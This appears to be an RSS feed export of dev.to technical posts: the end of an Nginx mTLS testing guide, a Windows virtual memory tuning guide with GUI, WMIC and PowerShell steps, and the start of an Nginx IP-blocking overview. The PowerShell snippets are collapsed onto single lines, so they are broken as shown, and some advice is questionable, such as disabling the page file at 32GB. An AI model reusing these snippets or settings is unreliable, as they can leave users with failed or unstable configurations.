&lt;p&gt;In addition to using &lt;code&gt;nginx -t&lt;/code&gt; to verify the syntax of the configuration file, you can also check the Nginx error log to confirm whether the mTLS configuration is loaded normally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo tail -f /var/log/nginx/error.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If no error messages (such as “SSL_CTX_load_verify_locations failed” or “invalid certificate”) appear, the mTLS configuration has been loaded successfully.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Testing Mutual Encryption Authentication
&lt;/h3&gt;

&lt;p&gt;Use the &lt;code&gt;openssl s_client&lt;/code&gt; tool on the client to simulate a TLS connection and test the mTLS authentication process. Ensure the client has the &lt;code&gt;client.pem&lt;/code&gt;, &lt;code&gt;client-key.pem&lt;/code&gt;, and &lt;code&gt;ca.pem&lt;/code&gt; files.&lt;/p&gt;

&lt;h4&gt;
  
  
  4.2.1 Testing a Valid Client Connection
&lt;/h4&gt;

&lt;p&gt;Run the following command to establish a TLS connection to the Nginx proxy port (6380):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;openssl s_client -connect 192.168.1.200:6380 \
    -cert /path/to/client.pem \
    -key /path/to/client-key.pem \
    -CAfile /path/to/ca.pem
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the connection is successful, the output will include the following key information:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;Verify return code: 0 (ok)&lt;/code&gt; (indicating successful certificate verification)&lt;/li&gt;
&lt;li&gt;  Detailed information about the server certificate (such as issuer, validity period)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Next, test the Redis service access (enter the following commands in the &lt;code&gt;openssl s_client&lt;/code&gt; interactive interface):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Enter Redis authentication password (if the backend Redis has authentication enabled)
AUTH YourRedisPassword
# Expected response: +OK

# Test the Redis PING command
PING
# Expected response: +PONG

# Test data writing and reading
SET test_key "mtls_test_value"
# Expected response: +OK

GET test_key
# Expected response: $13\nmtls_test_value
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  4.2.2 Testing an Invalid Client Connection
&lt;/h4&gt;

&lt;p&gt;To verify the security of mTLS, test scenarios with invalid client certificates (e.g., using an unsigned certificate or omitting the client certificate):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Scenario 1: Omit the client certificate
openssl s_client -connect 192.168.1.200:6380 -CAfile /path/to/ca.pem

# Scenario 2: Use an untrusted client certificate
openssl s_client -connect 192.168.1.200:6380 \
    -cert /path/to/untrusted-client.pem \
    -key /path/to/untrusted-client-key.pem \
    -CAfile /path/to/ca.pem
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In both scenarios, the connection should be rejected, and the output will include &lt;code&gt;Verify return code: 19 (self-signed certificate in certificate chain)&lt;/code&gt; or &lt;code&gt;SSL alert number 116&lt;/code&gt; (indicating client certificate verification failure), confirming that mTLS effectively blocks unauthorized access.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Conclusion
&lt;/h2&gt;

&lt;p&gt;This document systematically elaborates on the implementation process of Nginx TCP Layer 4 port proxy and mTLS mutual encryption authentication, covering technical background, configuration steps, and verification methods. By combining Nginx’s high-performance proxy capabilities with mTLS’s strict mutual authentication mechanism, enterprises can establish a secure and reliable network communication channel, effectively addressing security risks such as unauthorized access and data leakage in traditional proxy architectures.&lt;/p&gt;

</description>
      <category>nginx</category>
      <category>tls</category>
      <category>encryption</category>
    </item>
    <item>
      <title>Complete Guide to Windows Virtual Memory: From Principles to Practice, Fix Low Memory Lag Issues</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Mon, 17 Nov 2025 11:09:56 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-windows-virtual-memory-from-principles-to-practice-fix-low-memory-lag-issues-4b6j</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-windows-virtual-memory-from-principles-to-practice-fix-low-memory-lag-issues-4b6j</guid>
      <description>&lt;p&gt;Have you often encountered sudden lag on your Windows PC, received “low memory” warnings when opening multiple tasks, or watched the progress bar stall endlessly when running large software like Photoshop or Premiere Pro? Many times, this isn’t because your physical memory (RAM) is completely insufficient, but because your virtual memory configuration hasn’t kept up with your actual needs. This article will start from technical principles, combine the latest features of Windows systems in 2025, and teach you how to scientifically set up virtual memory to avoid resource waste while maximizing system performance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/complete-guide-to-windows-virtual-memory-from-principles-to-practice-fix-low-memory-lag-issues.html" rel="noopener noreferrer"&gt;# Complete Guide to Windows Virtual Memory: From Principles to Practice, Fix Low Memory Lag Issues&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7n4eln80ru4qetym9ti.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7n4eln80ru4qetym9ti.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. What is Virtual Memory? Why is it Important for Windows?
&lt;/h2&gt;

&lt;p&gt;Before diving into setup methods, we need to understand: what role does virtual memory actually play? Simply put, it’s “temporary memory” simulated by the Windows system using hard drive space. When physical memory (RAM) is occupied to a certain extent, the system automatically transfers infrequently used data to virtual memory, thereby freeing up RAM resources for active applications.&lt;/p&gt;

&lt;p&gt;Here’s a key insight: &lt;strong&gt;virtual memory is not a “replacement” for RAM, but a “supplement”&lt;/strong&gt; . Because the read-write speed of hard drives (even SSDs) is much slower than RAM (usually more than 10 times slower), over-reliance on virtual memory will instead slow down the system. However, without it, when RAM is exhausted, applications will crash directly or the system will freeze.&lt;/p&gt;

&lt;h3&gt;
  
  
  Core Difference Comparison Between RAM and Virtual Memory (Hard Drive)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;Physical Memory (RAM)&lt;/th&gt;
&lt;th&gt;Virtual Memory (HDD/SSD)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Read-Write Speed&lt;/td&gt;
&lt;td&gt;Extremely fast (DDR4 ~20GB/s, DDR5 up to 50GB/s+)&lt;/td&gt;
&lt;td&gt;Slower (SATA SSD ~500MB/s, NVMe SSD ~3-7GB/s)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Storage Capacity&lt;/td&gt;
&lt;td&gt;Smaller (common sizes: 8GB, 16GB, 32GB)&lt;/td&gt;
&lt;td&gt;Larger (depends on remaining hard drive space)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Persistence&lt;/td&gt;
&lt;td&gt;Lost when power is off (temporary storage)&lt;/td&gt;
&lt;td&gt;Retained when power is off (stores page file long-term)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Core Function&lt;/td&gt;
&lt;td&gt;Runs currently active applications/processes&lt;/td&gt;
&lt;td&gt;Temporarily stores inactive data to free up RAM&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  2. When Do You Need to Manually Set Virtual Memory? Isn’t Default Automatic Management Sufficient?
&lt;/h2&gt;

&lt;p&gt;Windows systems by default “automatically manage paging file size for all drives”, dynamically adjusting virtual memory based on RAM capacity and usage. However, in the following 4 scenarios, &lt;strong&gt;manually setting virtual memory can significantly improve the experience&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 1: Small physical memory (≤4GB)&lt;/strong&gt; : Default settings may frequently trigger “low memory” warnings due to insufficient virtual memory, leading to browser crashes and unsaved document loss.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 2: Running professional software/games&lt;/strong&gt;: Some design software (such as AutoCAD, 3ds Max) and large games (such as &lt;em&gt;Cyberpunk 2077&lt;/em&gt;) clearly require a minimum virtual memory size. Failure to meet this requirement may result in failure to launch or frequent crashes.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 3: System lags frequently but RAM is not full&lt;/strong&gt;: This may be due to unreasonable default virtual memory allocation, causing the system to frequently “swap data” between RAM and hard drive (known as “page thrashing”).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 4: System drive space is tight&lt;/strong&gt;: By default, virtual memory is stored on the C drive. If the remaining space on the C drive is less than 10GB, virtual memory may not be able to expand, leading to performance issues.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  3. What’s the Right Size for Windows Virtual Memory? 2025 Latest Recommended Plan
&lt;/h2&gt;

&lt;p&gt;There’s no “one-size-fits-all” standard for virtual memory size, but it can be accurately matched based on &lt;strong&gt;physical memory capacity&lt;/strong&gt; and &lt;strong&gt;usage scenarios&lt;/strong&gt;. Below is a tested and verified recommended plan (unit: GB, 1GB=1024MB):&lt;/p&gt;

&lt;h3&gt;
  
  
  Virtual Memory Setting Recommendations for Different RAM Capacities
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Physical Memory (RAM)&lt;/th&gt;
&lt;th&gt;Is Disabling Virtual Memory Recommended?&lt;/th&gt;
&lt;th&gt;Recommended Initial Size&lt;/th&gt;
&lt;th&gt;Recommended Maximum Size&lt;/th&gt;
&lt;th&gt;Applicable Scenarios&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;≤4GB&lt;/td&gt;
&lt;td&gt;❌ Definitely not recommended&lt;/td&gt;
&lt;td&gt;RAM×1.5 (e.g., 4GB→6GB)&lt;/td&gt;
&lt;td&gt;RAM×3 (e.g., 4GB→12GB)&lt;/td&gt;
&lt;td&gt;Daily office work (Word/Excel), light web browsing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8GB&lt;/td&gt;
&lt;td&gt;❌ Not recommended&lt;/td&gt;
&lt;td&gt;RAM×1 (e.g., 8GB→8GB)&lt;/td&gt;
&lt;td&gt;RAM×2 (e.g., 8GB→16GB)&lt;/td&gt;
&lt;td&gt;Moderate multitasking, light design (basic Photoshop editing), mainstream online games&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16GB&lt;/td&gt;
&lt;td&gt;✅ Optional to disable&lt;/td&gt;
&lt;td&gt;RAM×0.5 (e.g., 16GB→8GB)&lt;/td&gt;
&lt;td&gt;RAM×1.5 (e.g., 16GB→24GB)&lt;/td&gt;
&lt;td&gt;Heavy multitasking, professional design, 3A games (1080P)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;≥32GB&lt;/td&gt;
&lt;td&gt;✅ Recommended to disable (unless special needs)&lt;/td&gt;
&lt;td&gt;2GB (minimum guarantee)&lt;/td&gt;
&lt;td&gt;8GB (maximum limit)&lt;/td&gt;
&lt;td&gt;Workstation-level tasks (video rendering, multiple VMs running)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Important Reminder&lt;/strong&gt;: 1. It’s recommended to set the “Initial Size” and “Maximum Size” of virtual memory to the same value to avoid hard drive fragmentation caused by frequent system adjustments to the page file size; 2. The maximum size should not exceed 1/8 of the remaining space of the hard drive partition to prevent occupying too much storage resources.&lt;/p&gt;

&lt;h3&gt;
  
  
  Which Drive to Set Virtual Memory On? Tips for Maximizing Performance
&lt;/h3&gt;

&lt;p&gt;Choosing the right partition has a greater impact on performance than worrying about the size! The correct priority order is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;First choice: NVMe SSD partition with sufficient free space&lt;/strong&gt;: The high-speed read-write of NVMe SSD can minimize the performance loss of virtual memory, and do not choose the system drive (C drive) to avoid seizing system I/O resources.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Second choice: SATA SSD partition&lt;/strong&gt;: Performance is slightly inferior to NVMe but still much better than mechanical hard drives.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Not recommended: Mechanical hard drive (HDD)&lt;/strong&gt; : Read-write speed is too slow, overuse will cause severe system lag.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  4. 3 Methods to Set Windows Virtual Memory: GUI + Command Line + PowerShell
&lt;/h2&gt;

&lt;p&gt;Below are virtual memory setup methods for different user habits, covering GUI (suitable for ordinary users) and command line (suitable for IT administrators/advanced users). The operation steps have been verified on Windows 10/11 systems.&lt;/p&gt;

&lt;h3&gt;
  
  
  Method 1: Set via “System Properties” GUI (Most Common)
&lt;/h3&gt;

&lt;p&gt;Suitable for most users with intuitive steps and no code required:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Press &lt;strong&gt;Win + R&lt;/strong&gt; to open the “Run” dialog box, type &lt;strong&gt;systempropertiesadvanced&lt;/strong&gt; and press Enter to open the “System Properties” window.&lt;/li&gt;
&lt;li&gt;  In “System Properties”, switch to the “Advanced” tab, and click the [Settings] button in the “Performance” area.&lt;/li&gt;
&lt;li&gt;  In the “Performance Options” window, continue to switch to the “Advanced” tab, and click the [Change] button in the “Virtual Memory” area.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa6jqvud78z24afcfwrnk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa6jqvud78z24afcfwrnk.png" width="800" height="664"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Uncheck “Automatically manage paging file size for all drives”, then select the partition where you want to set virtual memory (e.g., Drive D, preferably an SSD partition) from the list below.&lt;/li&gt;
&lt;li&gt;  Select “Custom size”, enter the “Initial size” and “Maximum size” (refer to the table above, unit: MB), click [Set] → [OK].&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk7jdpn7wqyl84mg2wpy6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk7jdpn7wqyl84mg2wpy6.png" width="800" height="656"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Restart the computer for the settings to take effect.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;(Screenshot placeholder: System Properties – Performance Settings – Virtual Memory Change Interface)&lt;/p&gt;

&lt;h3&gt;
  
  
  Method 2: Manage via WMIC Command Line (Suitable for Batch Operations)
&lt;/h3&gt;

&lt;p&gt;Suitable for IT administrators or scenarios where multiple computers need to be configured quickly. Run Command Prompt as administrator:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Right-click the “Start” menu, select [Terminal (Admin)], press &lt;strong&gt;Ctrl + Shift + 2&lt;/strong&gt; to switch to the Command Prompt interface.&lt;/li&gt;
&lt;li&gt; Execute the following commands according to needs (copy and paste directly, note to modify the drive letter and values):&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8wxv4pmosgx8zycnpwtb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8wxv4pmosgx8zycnpwtb.png" width="800" height="739"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Enable automatic virtual memory management&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic computersystem where name="%computername%" set AutomaticManagedPagefile=True
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foadlxrrm4abqwqy8m4w2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foadlxrrm4abqwqy8m4w2.png" width="800" height="433"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Disable automatic management (prepare for customization)&lt;/strong&gt; :&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic computersystem where name="%computername%" set AutomaticManagedPagefile=False
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;View current virtual memory settings&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic pagefile list /format:list
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bomtzzexsbtgouvjn86.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bomtzzexsbtgouvjn86.png" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Set virtual memory for a specific drive (e.g., Drive C) (Example: Initial 4GB, Maximum 8GB)&lt;/strong&gt; :&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic pagefileset where name="C:\pagefile.sys" set InitialSize=4096,MaximumSize=8192
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;If you encounter “wmic not found” error, you need to enable WMIC using the following command:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;DISM /Online /Add-Capability /CapabilityName:WMIC~~~~
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Restart the computer after execution for the settings to take effect.&lt;/p&gt;

&lt;h3&gt;
  
  
  Method 3: Set via PowerShell Script (Preferred for Advanced Users)
&lt;/h3&gt;

&lt;p&gt;PowerShell is more flexible than Command Prompt, supporting batch configuration and scripting:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6mrmuoqdoy4q2pvcag1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6mrmuoqdoy4q2pvcag1.png" width="800" height="727"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Open Windows Terminal as administrator, press &lt;strong&gt;Ctrl + Shift + 1&lt;/strong&gt; to switch to the PowerShell interface.&lt;/li&gt;
&lt;li&gt; Execute the following commands to complete corresponding operations:&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;View detailed current virtual memory settings&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Get-CimInstance -ClassName Win32_PageFileUsage | Select-Object Name,InitialSize,MaximumSize,CurrentUsage
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8v0th3ew6jknalqnmbz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8v0th3ew6jknalqnmbz.png" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Customize virtual memory (Example: Drive E, Initial 2GB, Maximum 6GB)&lt;/strong&gt; :&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Define parameters $pageFilePath = "E:\pagefile.sys" $initialSize = 2048 # Initial size (MB) $maximumSize = 6144 # Maximum size (MB) # Apply settings Set-CimInstance -Query "SELECT * FROM Win32_PageFileSetting WHERE Name ='$pageFilePath'" -Property @{InitialSize = $initialSize MaximumSize = $maximumSize }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Restore automatic management&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$pageFilePath = "E:\pagefile.sys" Set-CimInstance -Query "SELECT * FROM Win32_PageFileSetting WHERE Name ='$pageFilePath'" -Property @{InitialSize = 0 MaximumSize = 0 }&lt;br&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
&lt;br&gt;
  &lt;br&gt;
  

&lt;ol&gt;
&lt;li&gt;Common Issues: No Effect After Setting Virtual Memory? Avoid These Pitfalls
&lt;/li&gt;
&lt;/ol&gt;
&lt;/h2&gt;


&lt;p&gt;Many users report that performance doesn’t improve after settings, or even becomes slower. Most likely, they’ve fallen into the following 3 pitfalls:&lt;/p&gt;

&lt;h3&gt;
  
  
  Pitfall 1: Virtual Memory Set on Mechanical Hard Drive
&lt;/h3&gt;

&lt;p&gt;The read-write speed of mechanical hard drives is much lower than RAM. Even if a large virtual memory size is set, lag will occur due to “too slow data exchange”. Solution: Migrate to an SSD partition.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pitfall 2: Large Gap Between Initial Size and Maximum Size
&lt;/h3&gt;

&lt;p&gt;If the initial size is 1GB and the maximum size is 20GB, the system will frequently “expand” virtual memory, causing a lot of hard drive fragmentation and slowing down the speed. Solution: Set both to the same value.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pitfall 3: Severely Insufficient Physical Memory but Relying Only on Virtual Memory
&lt;/h3&gt;

&lt;p&gt;If your computer only has 4GB RAM but you want to run Chrome (10 tabs) + Photoshop + WeChat at the same time, even if virtual memory is set to 12GB, lag will occur due to frequent paging. &lt;strong&gt;Ultimate Solution: Upgrade physical memory (RAM)&lt;/strong&gt; , which is the most fundamental way to improve multitasking performance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion: The “Golden Rules” for Virtual Memory Settings
&lt;/h2&gt;

&lt;p&gt;Virtual memory is a “memory buffer” for Windows systems, but not a “panacea”. Remember the following 3 points to achieve scientific configuration:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Prioritize physical memory&lt;/strong&gt;: 8GB is the entry threshold, 16GB is the current mainstream, and 32GB or more is suitable for professional scenarios;&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Virtual memory “just enough is best”&lt;/strong&gt; : Match the size according to RAM capacity, don’t blindly pursue “the larger the better”;&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Choose the right partition for storage location&lt;/strong&gt;: Prefer free NVMe SSD partitions, stay away from system drives and mechanical hard drives.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After setting up according to the methods in this article, you will find that the multitasking capability and stability of your computer have significantly improved. If you encounter specific problems, feel free to leave a comment below and I will answer them one by one.&lt;/p&gt;

</description>
      <category>windows</category>
      <category>virtualmemory</category>
    </item>
    <item>
      <title>Practical Guide to Dynamic IP Blocking in Nginx</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sun, 16 Nov 2025 13:42:37 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/practical-guide-to-dynamic-ip-blocking-in-nginx-3k0j</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/practical-guide-to-dynamic-ip-blocking-in-nginx-3k0j</guid>
      <description>&lt;p&gt;Blocking IPs dynamically in Nginx can effectively protect websites or applications from malicious requests, crawlers, or DDoS attacks. Compared to the traditional static method of modifying the configuration file and reloading Nginx, dynamic IP blocking can automatically identify and block malicious IPs in real-time, greatly enhancing security and operational efficiency. This article will elaborate on three mainstream solutions, combined with practical configurations and application scenarios, to help you implement them quickly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/practical-guide-to-dynamic-ip-blocking-in-nginx.html" rel="noopener noreferrer"&gt;# Practical Guide to Dynamic IP Blocking in Nginx&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jqk5mkd9yudvwh5jxik.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jqk5mkd9yudvwh5jxik.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Solutions for Dynamic IP Blocking
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Fail2ban Tool
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Method&lt;/strong&gt;: It monitors Nginx logs, and when a certain threshold is reached, it calls the firewall or modifies the configuration to block the IP.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Advantages&lt;/strong&gt;: Easy to configure, has a mature community, and supports multiple services.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Disadvantages&lt;/strong&gt;: Depends on log analysis, has a delay, and frequent reloads can affect performance.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Applicable Scenarios&lt;/strong&gt;: Protects against brute-force attacks, scanner attacks, and abnormal request attacks.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Nginx Lua + Redis
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Method&lt;/strong&gt;: Uses ngx_lua to query the Redis blacklist during the access phase.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Advantages&lt;/strong&gt;: High performance, takes effect in real-time, and can be shared distributively.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Disadvantages&lt;/strong&gt;: Requires OpenResty/Lua, and the architecture is complex.&lt;/li&gt;
